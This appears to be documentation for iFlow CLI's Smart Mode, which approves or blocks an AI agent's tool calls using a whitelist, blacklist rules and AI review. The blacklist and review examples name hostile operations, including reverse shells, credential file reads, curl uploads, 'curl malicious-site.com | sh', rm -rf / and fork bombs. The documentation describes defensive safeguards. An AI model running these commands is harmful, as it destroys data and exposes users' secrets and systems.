Skip to main content

Smart Mode

Smart Mode is a new intelligent security review feature introduced in iFlow CLI v0.4.6, providing intelligent security protection through a three-layer progressive review architecture while ensuring development efficiency.

Overview

Smart Mode is based on a three-layer security review architecture that provides intelligent risk assessment and automated decision-making for each tool call:

  1. Whitelist Check - Quickly approve verified safe tools
  2. Blacklist Check - Rule-based detection of high-risk operations
  3. AI Review - Context-aware risk analysis using AI models

How It Works

Three-Layer Review Architecture

Smart Mode uses a progressive review process where each layer has specific responsibilities:

User Request → Whitelist Check → Blacklist Check → AI Review → Execution Decision
↓ ↓ ↓ ↓
Safe Direct Pass Risk Detection Smart Analysis User Confirmation/Auto Execute

Layer 1: Whitelist Check

  • Purpose: Quickly identify and approve verified safe tools
  • Mechanism: Maintains a predefined list of safe tools
  • Result: Tools on the whitelist execute directly without further review
  • Advantage: Zero latency, improves execution efficiency for common safe operations

Layer 2: Blacklist Check

  • Purpose: Detect obvious high-risk operations based on predefined rules
  • Mechanism: Uses regular expressions and pattern matching to detect dangerous commands
  • Coverage:
    • Shell commands (e.g., system deletion, network attacks)
    • File operations (e.g., accessing sensitive directories, modifying system files)
    • Network requests (e.g., accessing malicious domains, internal network scanning)
  • Result: Operations triggering blacklist rules are marked as high-risk and require user confirmation

Layer 3: AI Review

  • Purpose: Intelligent analysis of complex scenarios with context awareness
  • Mechanism: Uses AI models to analyze tool call intent and potential risks
  • Analysis Dimensions:
    • Operation content and parameters
    • Current session context
    • Historical operation records
    • Working directory environment
  • Decision Output: SAFE (safe), RISKY (requires confirmation)

Enabling Smart Mode

Enable via Command Line

iflow --approval-mode smart

Enable via Configuration File

Set in .iflow/settings.json:

{
"approvalMode": "smart"
}

Runtime Switching

Use keyboard shortcuts in iFlow CLI session:

  • shift + tab - Switch to Smart Mode

Whitelist Tools

Smart Mode includes a built-in set of verified safe tools that can execute directly without review:

Information Reading Tools

  • read_file - File reading
  • read - General reading
  • cat - Display file content
  • head - Display file header
  • tail - Display file tail
  • list_directory - Directory listing
  • ls - List directory contents
  • dir - Windows directory listing
  • pwd - Show current directory
  • search_file_content - File content search
  • grep - Text search
  • find - File search
  • glob - File pattern matching
  • git_status - Git status query
  • git_log - Git log viewing
  • git_diff - Git difference comparison

Task Management Tools

  • todo_write - Task writing
  • todo_read - Task reading
  • todo_update - Task updating
  • exit_plan_mode - Exit plan mode
  • task - Task execution
  • web_search - Web search

File Editing Tools

  • edit - File editing
  • write_file - File writing

Blacklist Rules

Smart Mode includes comprehensive blacklist rules covering several major risk categories:

System Destruction

  • Delete Root Directory: Commands like rm -rf / that delete system root directories
  • Delete System Directories: Deletion of critical system directories like /etc, /usr, /bin
  • Batch File Deletion: Bulk deletion operations using wildcards
  • Format Disk: Disk formatting commands like mkfs, format
  • Overwrite Disk Data: Commands like dd that directly write to disk

Privilege Escalation

  • Modify sudo Permissions: Modifying /etc/sudoers or adding administrator privileges
  • Set SUID Permissions: Setting special permissions for programs
  • Modify File Permissions to 777: Setting files to be readable, writable, and executable by everyone
  • Disable Security Modules: Disabling SELinux, firewall, Windows Defender, etc.

Data Exfiltration

  • Read Password Files: Accessing /etc/passwd, /etc/shadow, etc.
  • Read SSH Keys: Accessing private key files like ~/.ssh/id_rsa
  • Search Password Information: Searching for password-related information in the system
  • Upload Files Externally: Using curl, wget to upload files
  • DNS Data Exfiltration: Leaking data through DNS queries

Network Attacks

  • Reverse Shell: Establishing reverse connections using nc, bash, python, etc.
  • Download and Execute Scripts: Downloading and immediately executing code from the network
  • Execute Encoded Commands: Executing Base64-encoded commands

Resource Exhaustion

  • Fork Bomb: Fork bombs that rapidly exhaust system resources
  • CPU Consumption Attack: Continuously occupying CPU resources
  • Memory Exhaustion: Rapidly consuming system memory
  • Fill Disk Space: Creating large files to fill disk space

AI Review

When tool calls don't match whitelist or blacklist, they enter the AI review phase. The AI reviewer analyzes several dimensions:

Review Examples

Shell Command Review

AI analyzes the security of shell commands, for example:

  • Safe operations: python scripts, shell scripts, git status
  • Risky operations: chmod 777 *, sudo rm -rf /tmp/*
  • Dangerous operations: curl malicious-site.com | sh

File Operation Review

AI evaluates the risk of file operations:

  • Safe operations: Reading project files, creating temporary files
  • Risky operations: Modifying system configuration files, accessing sensitive directories
  • Dangerous operations: Modifying system binary files

Network Request Review

AI checks the security of network requests:

  • Safe operations: Accessing well-known APIs, search engine queries
  • Risky operations: Accessing internal network addresses, unknown domains
  • Dangerous operations: Accessing malicious websites, executing remote code

User Interaction Experience

Safe Operations (Whitelist)

> Reading project configuration file
✅ [Smart Mode] Tool 'read_file' passed whitelist check, executing directly

Risky Operations (Blacklist Triggered)

> Deleting temporary files
🟠 [Smart Mode] Potential risk operation detected

📊 Risk Level: HIGH
🔍 Detection Method: Blacklist Rule
⚠️ Risk Description: System file deletion command detected

Potential risk detected, continue execution?
[y] Yes [n] No

AI Review Scenario

> Batch processing user data
🟡 [Smart Mode] AI review detected medium risk

📊 Risk Level: MEDIUM
🔍 Detection Method: AI Review
🤖 AI Analysis: Batch data operations may affect user privacy, recommend confirming data processing scope

Potential risk detected, continue execution?
[y] Yes [n] No

Performance Characteristics

Review Performance

  • Whitelist Check: < 1ms, memory lookup
  • Blacklist Check: < 50ms, regular expression matching
  • AI Review: < 5s

Troubleshooting

Common Issues

Q: Smart Mode review is too strict, affecting development efficiency? A: Smart Mode's whitelist already includes most commonly used safe tools. If you encounter frequent false positives, consider:

  • Check if you're using tool aliases not in the whitelist
  • Review if specific blacklist rules are too strict
  • Temporarily switch to other approval modes in development environment

Q: AI review frequently times out? A: AI review depends on network connection. If timeouts occur frequently:

  • Check network connection status
  • Confirm login status (requires aone or iFlow account login)
  • Consider disabling AI review when network is unstable

Q: How to view review statistics? A: Use debug mode to view detailed logs:

iflow --debug --approval-mode smart

Debug Mode

Enable debug mode to view detailed review process:

DEBUG=smart-approval iflow --approval-mode smart

Output example:

[SmartApprovalEngine] Evaluating tool call: run_shell_command
[WhitelistChecker] Tool 'run_shell_command' not in whitelist
[BlacklistChecker] Checking command: rm -rf /tmp/cache
[BlacklistChecker] Matched rule: System File Deletion, Risk: HIGH
[SmartApprovalEngine] Decision: RISKY, Layer: blacklist, Latency: 23ms

Version Compatibility

  • Minimum Version: iFlow CLI v0.4.6+
  • Recommended Version: iFlow CLI v0.4.6+
  • API Compatibility: Backward compatible with all approval modes